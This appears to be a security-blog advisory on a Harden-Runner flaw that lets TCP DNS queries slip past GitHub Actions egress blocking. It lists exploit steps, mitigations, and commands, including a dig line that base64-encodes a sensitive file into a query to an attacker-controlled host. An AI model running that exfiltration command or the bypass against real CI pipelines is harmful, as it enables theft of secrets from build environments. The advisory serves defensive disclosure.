Listen to this Post
The vulnerability resides in Harden-Runner, a CI/CD security agent that functions as an EDR for GitHub Actions runners. Versions 2.15.1 and earlier enforce egress policies by filtering outbound connections at the network layer. When the `egress-policy: block` setting is enabled with a restrictive `allowed-endpoints` list (e.g., only github.com:443), all non‑compliant traffic is expected to be denied. However, the filtering mechanism fails to adequately restrict DNS queries that use TCP as the transport protocol. TCP‑based DNS is commonly employed for large responses or as a fallback when UDP is unavailable. Attackers who already have code execution within the GitHub Actions workflow can leverage tools like `dig` with the `+tcp` flag to initiate TCP DNS queries to arbitrary external DNS servers. Because these TCP DNS packets are not blocked by the policy, they can be used to exfiltrate data or establish covert communication channels. The issue stems from an oversight in the network‑filtering implementation, which does not treat TCP‑based DNS traffic as subject to the same restrictions as other outbound connections. The vulnerability was addressed in version 2.16.0 by expanding the filtering rules to cover TCP DNS queries.
Platform: Harden-Runner
Version: 2.15.1 below
Vulnerability: DNS TCP bypass
Severity: Medium 4.6
Date: 2026-03-20
Prediction: Already patched
What Undercode Say:
Analytics showing bash commands and codes related to the blog
Verify egress policy is active grep "egress-policy: block" .github/workflows/.yml Attempt UDP DNS (should be blocked) dig +short @8.8.8.8 example.com Bypass using TCP DNS (succeeds if vulnerable) dig +tcp +short @8.8.8.8 example.com Check for allowed endpoints configuration cat /etc/harden-runner/config.yaml | grep allowed-endpoints Simulate data exfiltration via TCP DNS tunnel dig +tcp @attacker-controlled.com $(base64 -w0 sensitive.txt).attacker.com
how Exploit:
- Gain code execution in a GitHub Actions workflow (e.g., via malicious PR, compromised dependency).
- Identify that `egress-policy: block` is enabled with a restrictive allowed‑endpoints list.
- Use `dig +tcp` or any tool that forces DNS over TCP to query an external DNS server not in the allowed list.
- Encapsulate stolen data into DNS query names or exfiltrate through DNS responses.
- Establish a covert C2 channel by issuing repeated TCP DNS queries to a remote server.
Protection from this CVE
- Upgrade Harden-Runner to version 2.16.0 or later.
- If immediate upgrade is not possible, implement network‑layer firewall rules that explicitly block TCP port 53 outbound, except for authorized internal DNS servers.
- Monitor GitHub Actions workflow logs for unexpected DNS traffic (especially TCP DNS queries).
- Apply principle of least privilege to workflows, minimizing the attack surface for initial code execution.
Impact:
Successful exploitation allows an attacker with pre‑existing code execution in a GitHub Actions workflow to bypass network egress controls, enabling data exfiltration, communication with external C2 infrastructure, and potential lateral movement within the CI/CD environment.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

